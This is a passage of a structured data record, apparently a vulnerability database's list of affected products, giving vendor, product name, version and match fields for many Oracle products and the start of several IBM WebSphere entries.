"1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty 